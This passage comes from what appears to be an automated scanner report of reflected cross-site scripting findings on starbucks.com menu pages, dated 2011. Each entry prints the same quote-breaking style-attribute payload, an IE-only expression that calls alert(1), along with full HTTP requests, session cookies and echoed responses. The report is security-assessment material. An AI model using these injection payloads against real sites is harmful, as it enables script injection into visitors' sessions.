<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino?76702"style="x:expression(alert(1))"b4ae84575bd=1"/> ...[SNIP]...
1.702. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2267"style%3d"x%3aexpression(alert(1))"213c4c81aec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2267"style="x:expression(alert(1))"213c4c81aec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/bottled-drinks/espresso-and-cream-doubleshot?c2267"style%3d"x%3aexpression(alert(1))"213c4c81aec=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:30:30 GMT Connection: close Content-Length: 39894
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot?c2267"style="x:expression(alert(1))"213c4c81aec=1"/> ...[SNIP]...
1.703. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 946db"style%3d"x%3aexpression(alert(1))"31b738e1403 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 946db"style="x:expression(alert(1))"31b738e1403 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot?946db"style%3d"x%3aexpression(alert(1))"31b738e1403=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:31:33 GMT Connection: close Content-Length: 39754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot?946db"style="x:expression(alert(1))"31b738e1403=1"/> ...[SNIP]...
1.704. http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a9dc"style%3d"x%3aexpression(alert(1))"2308b961066 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a9dc"style="x:expression(alert(1))"2308b961066 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/bottled-drinks/mocha-doubleshot-with-energy?2a9dc"style%3d"x%3aexpression(alert(1))"2308b961066=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:30:11 GMT Connection: close Content-Length: 39974
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy?2a9dc"style="x:expression(alert(1))"2308b961066=1"/> ...[SNIP]...
1.705. http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3544d"style%3d"x%3aexpression(alert(1))"5aba95253f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3544d"style="x:expression(alert(1))"5aba95253f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy?3544d"style%3d"x%3aexpression(alert(1))"5aba95253f2=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:30:09 GMT Connection: close Content-Length: 39870
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy?3544d"style="x:expression(alert(1))"5aba95253f2=1"/> ...[SNIP]...
1.706. http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/brewed-coffee/bold-pick-of-the-day
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97603"style%3d"x%3aexpression(alert(1))"ccda16a9e2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97603"style="x:expression(alert(1))"ccda16a9e2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/brewed-coffee/bold-pick-of-the-day?97603"style%3d"x%3aexpression(alert(1))"ccda16a9e2a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:21:30 GMT Connection: close Content-Length: 41233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day?97603"style="x:expression(alert(1))"ccda16a9e2a=1"/> ...[SNIP]...
1.707. http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/brewed-coffee/cafe-misto
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84eea"style%3d"x%3aexpression(alert(1))"3de17d6a195 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84eea"style="x:expression(alert(1))"3de17d6a195 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/brewed-coffee/cafe-misto?84eea"style%3d"x%3aexpression(alert(1))"3de17d6a195=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:22:02 GMT Connection: close Content-Length: 41226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto?84eea"style="x:expression(alert(1))"3de17d6a195=1"/> ...[SNIP]...
1.708. http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/brewed-coffee/clover-brewed-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b665"style%3d"x%3aexpression(alert(1))"b850b32aa93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5b665"style="x:expression(alert(1))"b850b32aa93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/brewed-coffee/clover-brewed-coffee?5b665"style%3d"x%3aexpression(alert(1))"b850b32aa93=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:21:33 GMT Connection: close Content-Length: 40818
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee?5b665"style="x:expression(alert(1))"b850b32aa93=1"/> ...[SNIP]...
1.709. http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/brewed-coffee/coffee-traveler
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea54a"style%3d"x%3aexpression(alert(1))"a6d99dcddd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea54a"style="x:expression(alert(1))"a6d99dcddd8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/brewed-coffee/coffee-traveler?ea54a"style%3d"x%3aexpression(alert(1))"a6d99dcddd8=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:21:39 GMT Connection: close Content-Length: 39163
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler?ea54a"style="x:expression(alert(1))"a6d99dcddd8=1"/> ...[SNIP]...
1.710. http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/brewed-coffee/decaf-pike-place-roast
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a68"style%3d"x%3aexpression(alert(1))"76d19496ed1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75a68"style="x:expression(alert(1))"76d19496ed1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/brewed-coffee/decaf-pike-place-roast?75a68"style%3d"x%3aexpression(alert(1))"76d19496ed1=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:21:44 GMT Connection: close Content-Length: 41017
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast?75a68"style="x:expression(alert(1))"76d19496ed1=1"/> ...[SNIP]...
1.711. http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/brewed-coffee/iced-coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfea6"style%3d"x%3aexpression(alert(1))"8ec24fe6e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dfea6"style="x:expression(alert(1))"8ec24fe6e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/brewed-coffee/iced-coffee?dfea6"style%3d"x%3aexpression(alert(1))"8ec24fe6e3=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:21:44 GMT Connection: close Content-Length: 41110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee?dfea6"style="x:expression(alert(1))"8ec24fe6e3=1"/> ...[SNIP]...
1.712. http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/brewed-coffee/pikes-place-roast
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 127b0"style%3d"x%3aexpression(alert(1))"1a2f3296cc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 127b0"style="x:expression(alert(1))"1a2f3296cc8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/brewed-coffee/pikes-place-roast?127b0"style%3d"x%3aexpression(alert(1))"1a2f3296cc8=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:21:19 GMT Connection: close Content-Length: 40828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast?127b0"style="x:expression(alert(1))"1a2f3296cc8=1"/> ...[SNIP]...
1.713. http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/chocolate/hot-chocolate
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e53d6"style%3d"x%3aexpression(alert(1))"103b6e338a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e53d6"style="x:expression(alert(1))"103b6e338a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/chocolate/hot-chocolate?e53d6"style%3d"x%3aexpression(alert(1))"103b6e338a0=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:31:52 GMT Connection: close Content-Length: 41071
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate?e53d6"style="x:expression(alert(1))"103b6e338a0=1"/> ...[SNIP]...
1.714. http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601a4"style%3d"x%3aexpression(alert(1))"868c1ee823c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 601a4"style="x:expression(alert(1))"868c1ee823c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/chocolate/peppermint-mocha-hot-chocolate?601a4"style%3d"x%3aexpression(alert(1))"868c1ee823c=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:31:26 GMT Connection: close Content-Length: 41286
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate?601a4"style="x:expression(alert(1))"868c1ee823c=1"/> ...[SNIP]...
1.715. http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d695f"style%3d"x%3aexpression(alert(1))"8d2325f8a6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d695f"style="x:expression(alert(1))"8d2325f8a6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/chocolate/salted-caramel-hot-chocolate?d695f"style%3d"x%3aexpression(alert(1))"8d2325f8a6d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:31:48 GMT Connection: close Content-Length: 41575
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate?d695f"style="x:expression(alert(1))"8d2325f8a6d=1"/> ...[SNIP]...
1.716. http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/chocolate/white-hot-chocolate
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5391b"style%3d"x%3aexpression(alert(1))"a19b060ce42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5391b"style="x:expression(alert(1))"a19b060ce42 in the application's response.
